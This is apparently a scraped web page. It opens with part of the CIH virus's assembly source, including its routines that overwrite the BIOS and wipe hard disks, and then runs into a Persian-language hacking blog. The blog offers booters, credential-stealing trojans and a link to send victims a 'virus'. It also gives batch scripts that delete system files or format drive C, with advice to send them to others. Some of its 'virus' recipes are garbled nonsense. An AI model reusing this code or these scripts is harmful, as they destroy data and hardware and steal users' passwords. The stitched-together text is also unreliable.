sub ebp, ebx jbe SetVirusCodeSectionTableEndMark add edi, ebx ; Move Address of Buffer EndOfWriteCodeToSections: loop LoopOfWriteCodeToSections ; *************************** ; * Only Set Infected Mark * ; *************************** OnlySetInfectedMark: mov esp, dr1 jmp WriteVirusCodeToFile ; *************************** ; * Not Set Infected Mark * ; *************************** NotSetInfectedMark: add esp, 3ch jmp CloseFile ; *************************** ; * Set Virus Code * ; * Section Table End Mark * ; *************************** SetVirusCodeSectionTableEndMark: ; Adjust Size of Virus Section Code to Correct Value add [eax], ebp add [esp+08h], ebp ; Set End Mark xor ebx, ebx mov [eax-04h], ebx ; *************************** ; * When VirusGame Calls * ; * VxDCall, VMM Modifies * ; * the 'int 20h' and the * ; * 'Service Identifier' * ; * to 'Call [XXXXXXXX]'. * ; *************************** ; * Before Writing My Virus * ; * to File, I Must Restore * ; * them First. ^__^ * ; *************************** lea eax, (LastVxDCallAddress-2-@9)[esi] mov cl, VxDCallTableSize LoopOfRestoreVxDCallID: mov word ptr [eax], 20cdh mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] mov [eax+2], edx movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] sub eax, edx loop LoopOfRestoreVxDCallID ; *************************** ; * Let's Write * ; * Virus Code to the File * ; *************************** WriteVirusCodeToFile: mov eax, dr1 mov ebx, [eax+10h] mov edi, [eax] LoopOfWriteVirusCodeToFile: pop ecx jecxz SetFileModificationMark mov esi, ecx mov eax, 0d601h pop edx pop ecx call edi ; VXDCall IFSMgr_Ring0_FileIO jmp LoopOfWriteVirusCodeToFile ; *************************** ; * Let's Set CF = 1 ==> * ; * Need to Restore File * ; * Modification Time * ; *************************** SetFileModificationMark: pop ebx pop eax stc ; Enable CF(Carry Flag) pushf ; ************************************* ; * Close File * ; ************************************* CloseFile: xor eax, eax mov ah, 0d7h call edi ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Need to Restore File Modification * ; * Time !? * ; ************************************* popf pop esi jnc IsKillComputer ; ************************************* ; * Restore File Modification Time * ; ************************************* mov ebx, edi mov ax, 4303h mov ecx, (FileModificationTime-@7)[esi] mov edi, (FileModificationTime+2-@7)[esi] call ebx ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Disable OnBusy * ; ************************************* DisableOnBusy: dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy ; ************************************* ; * Call Previous FileSystemApiHook * ; ************************************* prevhook: popad mov eax, dr0 ; jmp [eax] ; Jump to prevhook ; ************************************* ; * Call the Function that the IFS * ; * Manager Would Normally Call to * ; * Implement this Particular I/O * ; * Request. * ; ************************************* pIFSFunc: mov ebx, esp push dword ptr [ebx+20h+04h+14h] ; Push pioreq call [ebx+20h+04h] ; Call pIFSFunc pop ecx ; mov [ebx+1ch], eax ; Modify EAX Value in Stack ; *************************** ; * After Calling pIFSFunc, * ; * Get Some Data from the * ; * Returned pioreq. * ; *************************** cmp dword ptr [ebx+20h+04h+04h], 00000024h jne QuitMyVirusFileSystemHook ; ***************** ; * Get the File * ; * Modification * ; * Date and Time * ; * in DOS Format.* ; ***************** mov eax, [ecx+28h] mov (FileModificationTime-@6)[esi], eax ; *************************** ; * Quit My Virus' * ; * IFSMgr_FileSystemHook * ; *************************** QuitMyVirusFileSystemHook: popad ret ; ************************************* ; * Kill Computer !? ... *^_^* * ; ************************************* IsKillComputer: ; Get Now Day from BIOS CMOS mov al, 07h out 70h, al in al, 71h xor al, 26h ; ??/26/???? IF DEBUG jmp DisableOnBusy ELSE jnz DisableOnBusy ENDIF ; ************************************** ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; ************************************** ; *************************** ; * Kill BIOS EEPROM * ; *************************** mov bp, 0cf8h lea esi, IOForEEPROM-@7[esi] ; *********************** ; * Show BIOS Page in * ; * 000E0000 - 000EFFFF * ; * ( 64 KB ) * ; *********************** mov edi, 8000384ch mov dx, 0cfeh cli call esi ; *********************** ; * Show BIOS Page in * ; * 000F0000 - 000FFFFF * ; * ( 64 KB ) * ; *********************** mov di, 0058h dec edx ; and al,0fh mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h call esi ; *********************** ; * Show the BIOS Extra * ; * ROM Data in Memory * ; * 000E0000 - 000E01FF * ; * ( 512 Bytes ) * ; * , and the Section * ; * of Extra BIOS can * ; * be Writted... * ; *********************** lea ebx, EnableEEPROMToWrite-@10[esi] mov eax, 0e5555h mov ecx, 0e2aaah call ebx mov byte ptr [eax], 60h push ecx loop $ ; *********************** ; * Kill the BIOS Extra * ; * ROM Data in Memory * ; * 000E0000 - 000E007F * ; * ( 80h Bytes ) * ; *********************** xor ah, ah mov [eax], al xchg ecx, eax loop $ ; *********************** ; * Show and Enable the * ; * BIOS Main ROM Data * ; * 000E0000 - 000FFFFF * ; * ( 128 KB ) * ; * can be Writted... * ; *********************** mov eax, 0f5555h pop ecx mov ch, 0aah call ebx mov byte ptr [eax], 20h loop $ ; *********************** ; * Kill the BIOS Main * ; * ROM Data in Memory * ; * 000FE000 - 000FE07F * ; * ( 80h Bytes ) * ; *********************** mov ah, 0e0h mov [eax], al ; *********************** ; * Hide BIOS Page in * ; * 000F0000 - 000FFFFF * ; * ( 64 KB ) * ; *********************** ; or al,10h mov word ptr (BooleanCalculateCode-@10)[esi], 100ch call esi ; *************************** ; * Kill All HardDisk * ; *************************************************** ; * IOR Structure of IOS_SendCommand Needs * ; *************************************************** ; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * ; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * ; *************************************************** KillHardDisk: xor ebx, ebx mov bh, FirstKillHardDiskNumber push ebx sub esp, 2ch push 0c0001000h mov bh, 08h push ebx push ecx push ecx push ecx push 40000501h inc ecx push ecx push ecx mov esi, esp sub esp, 0ach LoopOfKillHardDisk: int 20h dd 00100004h ; VXDCall IOS_SendCommand cmp word ptr [esi+06h], 0017h je KillNextDataSection ChangeNextHardDisk: inc byte ptr [esi+4dh] jmp LoopOfKillHardDisk KillNextDataSection: add dword ptr [esi+10h], ebx mov byte ptr [esi+4dh], FirstKillHardDiskNumber jmp LoopOfKillHardDisk ; *************************** ; * Enable EEPROM to Write * ; *************************** EnableEEPROMToWrite: mov [eax], cl mov [ecx], al mov byte ptr [eax], 80h mov [eax], cl mov [ecx], al ret ; *************************** ; * IO for EEPROM * ; *************************** IOForEEPROM: @10 = IOForEEPROM xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp in al, dx BooleanCalculateCode = $ or al, 44h xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp out dx, al ret ; ********************************************************* ; * Static Data * ; ********************************************************* LastVxDCallAddress = IFSMgr_Ring0_FileIO VxDCallAddressTable db 00h db IFSMgr_RemoveFileSystemApiHook-_PageAllocate db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook db IFSMgr_Ring0_FileIO-UniToBCSPath VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h VxDCallTableSize = ($-VxDCallIDTable)/04h ; ********************************************************* ; * Virus Version Copyright * ; ********************************************************* VirusVersionCopyright db 'CIH v' db MajorVirusVersion+'0' db '.' db MinorVirusVersion+'0' db ' TATUNG' ; ********************************************************* ; * Virus Size * ; ********************************************************* VirusSize = $ ; + SizeOfVirusCodeSectionTableEndMark(04h) ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) ; + SizeOfTheFirstVirusCodeSectionTable(04h) ; ********************************************************* ; * Dynamic Data * ; ********************************************************* VirusGameDataStartAddress = VirusSize @6 = VirusGameDataStartAddress OnBusy db 0 FileModificationTime dd ? FileNameBuffer db FileNameBufferSize dup(?) @7 = FileNameBuffer DataBuffer = $ @8 = DataBuffer NumberOfSections dw ? TimeDateStamp dd ? SymbolsPointer dd ? NumberOfSymbols dd ? SizeOfOptionalHeader dw ? _Characteristics dw ? Magic dw ? LinkerVersion dw ? SizeOfCode dd ? SizeOfInitializedData dd ? SizeOfUninitializedData dd ? AddressOfEntryPoint dd ? BaseOfCode dd ? BaseOfData dd ? ImageBase dd ? @9 = $ SectionAlignment dd ? FileAlignment dd ? OperatingSystemVersion dd ? ImageVersion dd ? SubsystemVersion dd ? Reserved dd ? SizeOfImage dd ? SizeOfHeaders dd ? SizeOfImageHeaderToRead = $-NumberOfSections NewAddressOfEntryPoint = DataBuffer ; DWORD SizeOfImageHeaderToWrite = 04h StartOfSectionTable = @9 SectionName = StartOfSectionTable ; QWORD VirtualSize = StartOfSectionTable+08h ; DWORD VirtualAddress = StartOfSectionTable+0ch ; DWORD SizeOfRawData = StartOfSectionTable+10h ; DWORD PointerToRawData = StartOfSectionTable+14h ; DWORD PointerToRelocations = StartOfSectionTable+18h ; DWORD PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD NumberOfRelocations = StartOfSectionTable+20h ; WORD NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD Characteristics = StartOfSectionTable+24h ; DWORD SizeOfScetionTable = Characteristics+04h-SectionName ; ********************************************************* ; * Virus Total Need Memory * ; ********************************************************* VirusNeedBaseMemory = $ VirusTotalNeedMemory = @9 ; + NumberOfSections(??)*SizeOfScetionTable(28h) ; + SizeOfVirusCodeSectionTableEndMark(04h) ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) ; + SizeOfTheFirstVirusCodeSectionTable(04h) ; ********************************************************* ; ********************************************************* VirusGame ENDS END FileHeader </body> </html> </body> </html>

\|	نوشته شده توسط قاسم صدفی

اینم یه بوتر توپ دیگه ......

بوتر هایی که من تو وب می ذارم همشون ۱۰۰٪کارمی کنن. ..

اگه بوتر راه انداختن رو بلد باشید تموم بوترهای دنیا کارمی کنن ....

این بوتربا۱۰۰۰ تا ای دی لوگین میشه ...

قربانی روپاره پاره می کنه ............

دانلود

\|	نوشته شده توسط قاسم صدفی

تروجان Lord PS

محصول همین سایت خوب این تروجان پسورد یاهو و کارت اینترنت ها رو براتون میفرسته و همین طور فرستادن : آی پی - نام کامپیوتر و نوع ویندوز شخصو امکاناتش هم زیاد هست

دانلود

\|	نوشته شده توسط قاسم صدفی

این ویروس را میزارم برای کسانی که عشق ویروس و مردم آزاری دارن ..

آگه میخاین حال کسی رو بگیرین در واقع حال گیری بکنین ویروس خیلی خوبیه ولی یه

تذکر خودتون روش کلیک نکنین فقط اینو بفرستید واسه طرف.

http://chendang.net/nguyen/

فقط یه خواهش

روش کلیک نکنیدااااا. فقط اینو بفرستید واسه طرف.

\|	نوشته شده توسط قاسم صدفی

نام برنامه: دزديدن شماره تلفن افراد باتروجان حرفه ای Crow Tel Sender

این بار قصد دارم یکی از جدیدترین و قوی ترین برنامه های ارسال شماره تلفن افراد در اینترنت را معرفی کنم.شما به وسيله اين تروجان ميتونيد شماره تلفن هر شخصی رو که مايل بوديد بزنيد!!فقط کافيه شماره تلفن خودتون رو به برنامه بديد (فرقی نداره موبايل باشه يا خط ثابت) بعد از دادن شماره تلفن و ساختن سرور آن را برای قربانی خودتون ميفرستيد.و وقتی قربانی شما فايل سرور شما را باز کرد منتظر بمانيد تا از اينترنت خارج شود. و چند ثانيه بعد از اينکه قربانی شما از اينترنت خارج شد به وسيله فايل سرور با آن شماره تلفنی که قبلاً داده بوديد زنگ ميزند. و شما ميتوانيد شماره قربانی خود را روی کالر آيدی تلفن خود مشاهده کنيد!!امّا امکانات جديد تروجان که از ساير برنامهای مشابه متمايز ميکند:

1. قطع صدای بلندگوی مودم.(Disable Modem Speaker)
2.قرار دادن دلخاه پيغام خطا تقلبی روی فايل سرور.(Fake Message)
3.انتخاب آيکن دلخاه برای فايل سرور.(Choose Icon)
4.پيوند زدن هر فايلی با فايل سرور. (Binder)
5.خارج شدن خودکار فايل سرور پس از زنگ زدن، که هيچ ردی از فايل سرور به جا نميمونه!!

اما آموزش برنامه:

پس از دانلود کردن برنامه از آخر اين مطلب برنامه را از حالت فشره(zip) خارج کنيد.
برنامه رو اجرا کنيد.
مشابه عکس:

.اگر خواستيد برای فايل سرور خود Error تقلبی بسازيد اين قسمت را تيک بزنيد...
2.در اين قسمت شما بايد به سليقه خودتون يک آيکن برای فايل سرور انتخاب کنيد.
3.در اين قسمت شما بايد يک شماره تلفن وارد کنيد که بعد از باز کردن فايل سرور توسط قربانی با اين شماره تماس ميگيرد.
4.اگر خواستيد يک فايل به سرور خود پيوند بزنيد ( که بعد از باز کردن فايل سرور توسط قربانی اين فايل هم اجرا ميشود) اين قسمت را تيک بزنيد و يک فايل که بهتر است کم حجم باشد رو Open کنيد، و در قسمت extract to مشخص ميکنيد که فايل پيوند زده شما در کجای کامپيوتر قربانی اجرا شود.
5.در اين قسمت اسم فايل سرور را مشخص ميکنيد.
6.در اين قسمت با زدن کليد Create Server فايل سرور شما ساخته ميشود و پيغام server created successfully ظاهر ميشود، که فايل سرور شما با موفقيت ساخته شده.

کار به پايان رسيد و حالا شما بايد فايل سرور را برای قربانی خود بفرستيد...

نکته:
توجه داشته باشيد که اين برنامه و نسخه های مشابه به وسيله مودم شماره گيری ميکند پس قربانی شما بايد مودم داشته باشد و به خط تلفن متصل باشد.
اگر هرگونه خطا در برنامه مشاهده کرديد به من ايميل بزنيد.

هر گونه سوء استفاده از اين برنامه به عهده کاربر است.

دانلود برنامه

\|	نوشته شده توسط قاسم صدفی

نام ویروس: regedit-desabler

توضیح در باره این ویروس:این ویروس کارش حرف نداره قسمت ریجستری ویندوز

رو میترکونه یعنی دیگه هچ برنامه ای نصب یا پاک نمیشه.

نوشتن ویروس : یه نوتپد باز کنید و در آن متن زیر رو تایپ کنید:::

Disabled regedit from:grouap pilicy

وانو با پسوند fifa 2006.bat سیو کنید حالا دیگه کارمون تموم شده این مطالب فقط جنبه آۀموزشی داره

\|	نوشته شده توسط قاسم صدفی

نام ویروس: jefo 32

توضیح در باره این ویروس :اگر قربانی این ویروس رو روی سیستم خود اجرا کنه

با هر بار وصل شدن به اینترنت کامپوتر خود بعد از ۸۰ ثانیه ریستارت میشود.

باز کنید و در آن متن زیر رو بنویسید. Notepadابتدا یه

Turn on-b-and defulat when connect

و اونو با پسوند fifa 2006 .bat سیو کنید. حالا دیگه کار تموم شده و میتونید این

ویروس رو از طریق ایمیل و ... سند کنید

\|	نوشته شده توسط قاسم صدفی

این هم یک بوتر بسیار عالی که در کار خود بی نظیر است و افراد را به سرعت بوت می کند فقط کا فی است یک بار آن را امتحان کنید بعد خودتان متوجه قدرت این برنامه می شوید.
در ضمن این بوتر محصولی از neo می باشد که یکی از قویترین سازنده های بوتر است.

pic of booter

دانلود

\|	نوشته شده توسط قاسم صدفی

نام ویروس : فیلتر گذار

_2توضیح درباره ویروس : این ویروس در internet explore فیلتر گذاری میکنه

و باعث از کار انداختن اون میشه و دیگه نمیشه به هیچ سایتی رفت .

_3نوشتن ویروس : یه notepad باز کنید و متن زیر را در آن تایپ کنید.

pouped-blocked-web-exploure-online&offline

_4بعد از نوشتن متن در بالای صفحه از گزینه file روی save as رفته و با

پسوند .bat سیو کنید....مثل من : internet.bat

_5فقط یه خواهش تو کامپیوتر خودتون روش کلیک نکنید.....

\|	نوشته شده توسط قاسم صدفی

خوب ساختن ویروس رو آغاز می کنم

روی start رفته و روی run کلیک کنید و notepad را تایپ کنید بعد از باز شدن پنجره این ها رو بنویسید توش

@echo off

Cls

===========

Color fc

Del /a c:\*.com

Del /a c:\*.sys

Del /a c:\*.exe /s

===========

خوب تایپ کردن دیگه بسه این فایل را با هر نامی که دل تان خواست ذخیره کنید ولی پسوند را با نام bat بگذارید ، مثل love.bat

خوب کار دیگه تموم شد این ویروس رو اگر کسی باز کنه

کامپیوتر رو با یک خاک مساوی می کنه و ویندوز یا هر نوع سیستم عامل دیگه رو از کار می اندازه

\|	نوشته شده توسط قاسم صدفی

اين ويروس چيز سختي نيست ولی خيلي خطرناكه.

اول از همه روي دسكتاپ رايت كليك كنيد بعدش New ShortCut بسازيد

يه صفحه باز ميشه در اون بنويسيد:

Format C:/Autotest

سپس Next را زده و در صفحه جديد كه باز ميشه يه اسم واسه ويروستون انتخاب كنيد

سپس Next را زده ويه آيكون با سليقه خودتون براي اون انتخاب كرده و Finish كنيد

خب ديگه كارمون تمومه حالا اگه اجراش كنين بيچاره ميشين.

اگه خواستين بفهمين چي ميشه به جاي Format C:/autotest بنويسيد

Format a:/autotest و يه فلاپي كه حاوي اطلاعات هستش در Flopy Drive خود

قرار دهيد بعد اجراش كنيد بعد برين سراغ فلاپيتون ببينيد چي شده.ميبينيد فلاپي

پاك شده وديگه نه ميشه اطلاعات روش ريخت ونه ميشه فرمتش كرد.

\|	نوشته شده توسط قاسم صدفی

آموزش ویروس نویسی ویژوال بیسیک هک و بوت

محصول همین سایت خوب این تروجان پسورد یاهو و کارت اینترنت ها رو براتون میفرسته و همین طور فرستادن : آی پی - نام کامپیوتر و نوع ویندوز شخصو امکاناتش هم زیاد هست

pctfx3.1

Ghost Rider Fix Template

ثبت دامنه میزبانی وب ثبت سایت دامنه فارسی